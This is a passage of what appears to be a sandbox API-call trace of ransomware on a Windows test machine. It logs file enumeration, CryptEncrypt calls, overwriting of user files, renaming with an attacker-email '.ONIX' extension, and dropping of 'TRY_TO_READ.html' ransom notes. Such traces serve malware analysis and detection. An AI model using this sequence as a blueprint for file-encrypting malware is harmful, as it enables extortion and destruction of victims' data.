hFile=0x4b4, lpBuffer=0x4daf18*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4daf18*, lpNumberOfBytesWritten=0x367f44c*=0x3a1, lpOverlapped=0x0) returned 1 [0121.369] UnlockFile (hFile=0x4b4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x3a1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.369] CloseHandle (hObject=0x4b4) returned 1 [0121.370] GetProcessHeap () returned 0x410000 [0121.370] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.370] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.372] GetProcessHeap () returned 0x410000 [0121.372] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.372] FindNextFileW (in: hFindFile=0x48eeb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0121.372] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4b4 [0121.373] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.373] LockFile (hFile=0x4b4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16b, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.373] SetFilePointerEx (in: hFile=0x4b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0121.373] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.373] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.373] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.373] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", dwFileAttributes=0x80) returned 1 [0121.374] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 53 [0121.374] GetProcessHeap () returned 0x410000 [0121.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x44faf8 [0121.374] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" [0121.374] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.374] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=363) returned 1 [0121.374] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x16b [0121.374] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.374] GetProcessHeap () returned 0x410000 [0121.374] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.374] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.374] WriteFile (in: hFile=0x4b4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.377] WriteFile (in: hFile=0x4b4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.378] WriteFile (in: hFile=0x4b4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.379] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16b) returned 0x442938 [0121.379] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16b) returned 0x46a0f0 [0121.379] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.379] ReadFile (in: hFile=0x4b4, lpBuffer=0x442938, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x16b, lpOverlapped=0x0) returned 1 [0121.379] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=-363, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.379] WriteFile (in: hFile=0x4b4, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x16b, lpOverlapped=0x0) returned 1 [0121.381] UnlockFile (hFile=0x4b4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.381] CloseHandle (hObject=0x4b4) returned 1 [0121.381] GetProcessHeap () returned 0x410000 [0121.382] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.382] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.384] GetProcessHeap () returned 0x410000 [0121.384] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.384] FindNextFileW (in: hFindFile=0x48eeb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0121.384] FindNextFileW (in: hFindFile=0x48eeb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0121.384] CloseHandle (hObject=0x3cc) returned 1 [0121.384] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.384] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x2f5)) [0121.384] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.385] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.385] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.385] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music9c354ca09c354b444c.lock") returned 59 [0121.385] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.385] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.385] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.386] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b480 [0121.386] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328868d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328868d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48eef0 [0121.386] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x328868d0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328868d0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.386] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x115ec2b0, ftCreationTime.dwHighDateTime=0x1d5dbc9, ftLastAccessTime.dwLowDateTime=0x52e709e0, ftLastAccessTime.dwHighDateTime=0x1d5e538, ftLastWriteTime.dwLowDateTime=0x52e709e0, ftLastWriteTime.dwHighDateTime=0x1d5e538, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Art1I", cAlternateFileName="")) returned 1 [0121.386] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Art1I\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\art1i\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8 [0121.387] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0121.387] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4b8 [0121.387] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.387] LockFile (hFile=0x4b8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1f8, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.388] SetFilePointerEx (in: hFile=0x4b8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0121.388] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.388] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.388] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.388] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", dwFileAttributes=0x80) returned 1 [0121.388] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned 48 [0121.388] GetProcessHeap () returned 0x410000 [0121.388] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd0) returned 0x477600 [0121.388] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" [0121.388] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.388] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=504) returned 1 [0121.388] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1f8 [0121.388] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.388] GetProcessHeap () returned 0x410000 [0121.388] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.388] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.388] WriteFile (in: hFile=0x4b8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.392] WriteFile (in: hFile=0x4b8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.393] WriteFile (in: hFile=0x4b8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x442938 [0121.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1f8) returned 0x46a0f0 [0121.394] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.395] ReadFile (in: hFile=0x4b8, lpBuffer=0x442938, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x1f8, lpOverlapped=0x0) returned 1 [0121.395] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.395] WriteFile (in: hFile=0x4b8, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x1f8, lpOverlapped=0x0) returned 1 [0121.396] UnlockFile (hFile=0x4b8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1f8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.396] CloseHandle (hObject=0x4b8) returned 1 [0121.397] GetProcessHeap () returned 0x410000 [0121.397] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.397] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.399] GetProcessHeap () returned 0x410000 [0121.399] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.399] FindNextFileW (in: hFindFile=0x48eef0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff636310, ftCreationTime.dwHighDateTime=0x1d5dbfd, ftLastAccessTime.dwLowDateTime=0x2e2e2b10, ftLastAccessTime.dwHighDateTime=0x1d5df6b, ftLastWriteTime.dwLowDateTime=0x2e2e2b10, ftLastWriteTime.dwHighDateTime=0x1d5df6b, nFileSizeHigh=0x0, nFileSizeLow=0xcc0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EsA18E9iH.m4a", cAlternateFileName="ESA18E~1.M4A")) returned 1 [0121.399] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\esa18e9ih.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4b8 [0121.399] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.399] LockFile (hFile=0x4b8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xcc0e, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.399] SetFilePointerEx (in: hFile=0x4b8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.399] ReadFile (in: hFile=0x4b8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.400] SetFilePointerEx (in: hFile=0x4b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.400] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.400] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.400] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.400] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a", dwFileAttributes=0x80) returned 1 [0121.400] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a") returned 50 [0121.400] GetProcessHeap () returned 0x410000 [0121.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4) returned 0x44faf8 [0121.400] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a" [0121.400] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.401] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=52238) returned 1 [0121.401] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xcc0e [0121.401] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.401] GetProcessHeap () returned 0x410000 [0121.401] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.401] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.401] WriteFile (in: hFile=0x4b8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.402] WriteFile (in: hFile=0x4b8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.403] WriteFile (in: hFile=0x4b8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.404] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc0e) returned 0x4dab68 [0121.404] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc0e) returned 0xf50048 [0121.405] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.405] ReadFile (in: hFile=0x4b8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0xcc0e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0xcc0e, lpOverlapped=0x0) returned 1 [0121.408] UnlockFile (hFile=0x4b8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xcc0e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.408] CloseHandle (hObject=0x4b8) returned 1 [0121.408] GetProcessHeap () returned 0x410000 [0121.408] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.409] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\esa18e9ih.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\EsA18E9iH.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\esa18e9ih.m4a.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 